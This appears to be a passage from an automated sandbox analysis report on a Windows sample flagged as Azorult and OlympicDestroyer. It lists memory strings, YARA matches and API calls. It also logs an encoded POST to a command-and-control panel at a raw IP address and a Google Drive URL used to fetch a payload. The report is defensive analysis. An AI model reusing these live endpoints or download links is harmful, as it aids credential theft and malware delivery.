Source: mozglue.dll.12.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, mozglue.dll.12.dr, softokn3.dll.12.dr, nssdbm3.dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr String found in binary or memory: http://www.mozilla.com0
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1COK25f1vT.exe, 1COK25f1vT.exe, 0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmp String found in binary or memory: https://dotbit.me/a/
Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, mozglue.dll.12.dr, softokn3.dll.12.dr, nssdbm3.dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /rothchildnew/Panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 185.29.11.112Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4f ed 3e 33 ed 3e 3c ed 3e 3d ed 3e 3a ed 3e 3b 8a 28 38 8c 28 39 f1 28 39 fb 28 39 fa 28 39 ff 4f 2f fb 3c 2f fb 38 2f fb 34 4b Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KO>3><>=>:>;(8(9(9(9(9O/</8/4K
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HttpOpenRequestA,HttpSendRequestA,GetMessageA,InternetReadFile, 12_2_00417D84
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7bnkiq90sqb2f9a5rfbavvv8a7avoa21/1639944750000/11699732749327025486/*/17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-b4-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49787 version: TLS 1.2

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Malicious sample detected (through community Yara rule)
Source: 12.2.1COK25f1vT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 12.2.1COK25f1vT.exe.2004391e.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 12.2.1COK25f1vT.exe.1ffd81cd.7.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 12.2.1COK25f1vT.exe.1ffb61e0.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Uses 32bit PE files
Source: 1COK25f1vT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 12.2.1COK25f1vT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 12.2.1COK25f1vT.exe.2004391e.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 12.2.1COK25f1vT.exe.1ffd81cd.7.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 12.2.1COK25f1vT.exe.1ffb61e0.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Detected potential crypto function
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_004016DC 0_2_004016DC
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9128E 0_2_02A9128E
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A963E9 0_2_02A963E9
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99D25 0_2_02A99D25
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A91D79 0_2_02A91D79
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A956AA 0_2_02A956AA
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99EA7 0_2_02A99EA7
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A94EB1 0_2_02A94EB1
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A946B2 0_2_02A946B2
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A98EB2 0_2_02A98EB2
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A966B6 0_2_02A966B6
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95A8B 0_2_02A95A8B
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A94E9A 0_2_02A94E9A
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A98E9D 0_2_02A98E9D
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99E91 0_2_02A99E91
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99EFE 0_2_02A99EFE
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99EC5 0_2_02A99EC5
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95AC7 0_2_02A95AC7
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A94ED9 0_2_02A94ED9
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A996D9 0_2_02A996D9
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A98EDD 0_2_02A98EDD
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A98ED1 0_2_02A98ED1
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A94631 0_2_02A94631
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A94637 0_2_02A94637
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A92209 0_2_02A92209
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99E09 0_2_02A99E09
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9926A 0_2_02A9926A
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99E66 0_2_02A99E66
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9564D 0_2_02A9564D
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95BA9 0_2_02A95BA9
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A957B5 0_2_02A957B5
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9678E 0_2_02A9678E
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A98F80 0_2_02A98F80
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99F9C 0_2_02A99F9C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A963ED 0_2_02A963ED
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A94FEF 0_2_02A94FEF
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A90BEE 0_2_02A90BEE
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A94FE6 0_2_02A94FE6
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A98FF9 0_2_02A98FF9
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A983CA 0_2_02A983CA
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A98FC2 0_2_02A98FC2
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A953DD 0_2_02A953DD
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A98F2A 0_2_02A98F2A
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95B32 0_2_02A95B32
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96737 0_2_02A96737
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99718 0_2_02A99718
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9671B 0_2_02A9671B
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9571A 0_2_02A9571A
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99F1F 0_2_02A99F1F
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A94711 0_2_02A94711
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99F6F 0_2_02A99F6F
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96766 0_2_02A96766
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95B71 0_2_02A95B71
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95775 0_2_02A95775
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95748 0_2_02A95748
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99F46 0_2_02A99F46
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95CAB 0_2_02A95CAB
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A948A3 0_2_02A948A3
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96CB9 0_2_02A96CB9
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A958BB 0_2_02A958BB
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A954BE 0_2_02A954BE
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A990B3 0_2_02A990B3
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9688D 0_2_02A9688D
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99091 0_2_02A99091
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96497 0_2_02A96497
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95CEA 0_2_02A95CEA
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A990EE 0_2_02A990EE
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A964E6 0_2_02A964E6
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A980C0 0_2_02A980C0
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A938DA 0_2_02A938DA
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95C21 0_2_02A95C21
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95425 0_2_02A95425
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9683D 0_2_02A9683D
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99035 0_2_02A99035
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96434 0_2_02A96434
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95403 0_2_02A95403
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95805 0_2_02A95805
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95C06 0_2_02A95C06
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96C19 0_2_02A96C19
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95C65 0_2_02A95C65
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95864 0_2_02A95864
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A94866 0_2_02A94866
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9904D 0_2_02A9904D
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9644E 0_2_02A9644E
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96C5A 0_2_02A96C5A
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A991B6 0_2_02A991B6
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95599 0_2_02A95599
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A945E5 0_2_02A945E5
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A955FD 0_2_02A955FD
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A965F3 0_2_02A965F3
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A991F7 0_2_02A991F7
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A991C9 0_2_02A991C9
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A965CB 0_2_02A965CB
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99DC3 0_2_02A99DC3
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A945C4 0_2_02A945C4
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A959C4 0_2_02A959C4
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A969D9 0_2_02A969D9
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99DDB 0_2_02A99DDB
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95D3D 0_2_02A95D3D
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9913E 0_2_02A9913E
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95931 0_2_02A95931
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99D32 0_2_02A99D32
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96534 0_2_02A96534
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95503 0_2_02A95503
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9596F 0_2_02A9596F
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99D61 0_2_02A99D61
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96975 0_2_02A96975
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99D75 0_2_02A99D75
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99D4D 0_2_02A99D4D
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9694C 0_2_02A9694C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A95555 0_2_02A95555
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: String function: 00403E78 appears 31 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: String function: 004034E4 appears 33 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A963E9 NtAllocateVirtualMemory,LoadLibraryA, 0_2_02A963E9
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A99933 NtProtectVirtualMemory, 0_2_02A99933
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A963ED NtAllocateVirtualMemory, 0_2_02A963ED
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A998A5 NtProtectVirtualMemory, 0_2_02A998A5
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96497 NtAllocateVirtualMemory, 0_2_02A96497
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A964E6 NtAllocateVirtualMemory, 0_2_02A964E6
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A998FD NtProtectVirtualMemory, 0_2_02A998FD
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A998DD NtProtectVirtualMemory, 0_2_02A998DD
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96434 NtAllocateVirtualMemory, 0_2_02A96434
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A9644E NtAllocateVirtualMemory, 0_2_02A9644E
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 0_2_02A96534 NtAllocateVirtualMemory, 0_2_02A96534
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: api-ms-win-core-file-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.12.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 1COK25f1vT.exe, 00000000.00000002.385785614.000000001FB10000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 00000000.00000000.280367785.0000000000418000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 00000000.00000002.382886146.0000000002090000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamepleasely.exeFE2X $- vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe Binary or memory string: OriginalFilename vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000000.380644936.0000000000418000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
